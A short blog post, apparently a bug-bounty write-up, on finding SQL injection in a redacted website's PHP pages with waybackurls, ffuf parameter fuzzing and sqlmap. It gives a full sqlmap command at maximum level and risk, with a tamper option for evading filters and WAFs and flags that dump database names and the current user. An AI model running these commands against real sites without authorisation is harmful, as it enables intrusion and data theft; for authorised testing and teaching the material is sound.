How I Found multiple SQL Injection with FFUF and Sqlmap in a few minutes

Enumeration Phase:

waybackurls https://redacted.org/ | uro | grep “.php” > php-files.txt

uro is a tool used to delete duplicate urls

Getting Parameters:

ffuf -w lowercase-parameters.txt -u "https://redacted.org/searchProgressCommitment.php?FUZZ=5"
ffuf -w lowercase-parameters.txt -X POST -d "FUZZ=5" -u "https://redacted.org/searchProgressCommitment.php"

Exploitation:

sqlmap -r req3.txt -p commitment --force-ssl --level 5 --risk 3 --dbms=”MYSQL” --hostname --current-user --current-db --dbs --tamper=between --no-cast
--level 5 --> Level of tests to perform.
--risk 3 --> Risk of tests to perform
--dbms --> back-end DBMS value
--no-cast --> to avoid use cast-alike statements during data fetching
--tamper --> to evade filters and WAF’s
"--hostname --current-user --current-db --dbs" --> to retrieve info about the database
#1st SQLI
#2nd SQLI
#3rd SQLI
#4th SQLI

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store